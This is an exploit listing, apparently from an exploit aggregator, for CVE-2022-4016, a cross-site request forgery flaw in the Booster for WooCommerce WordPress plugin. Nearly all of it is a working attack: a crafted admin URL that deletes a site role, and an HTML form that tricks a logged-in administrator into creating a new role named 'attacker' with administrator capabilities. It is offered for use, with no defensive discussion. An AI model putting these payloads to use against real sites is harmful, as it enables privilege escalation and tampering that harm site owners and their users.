Exploit for Booster for WooCommerce - Custom Role Creation/Deletion via CSRF CVE-2022-4016

## https://sploitus.com/exploit?id=WPEX-ID:9B77044C-FD3F-4E6F-A759-DCC3082DCBD6
To delete the custom role dj (it's possible to delete roles created by other plugins), make a logged in admin open https://example.com/wp-admin/admin.php?page=wcj-tools&tab=custom_roles&wcj_delete_role=dj

To create a custom role, make a logged in admin open a page containing the HTML code below

<form action="https://example.com/wp-admin/admin.php?page=wcj-tools&tab=custom_roles" method="POST">
    <input type="text" name="wcj_custom_role_id" value="via-csrf">
    <input type="text" name="wcj_custom_role_name" value="attacker">
    <input type="text" name="wcj_custom_role_caps" value="administrator">
    <input type="submit" name="submit" value="submit">
</form>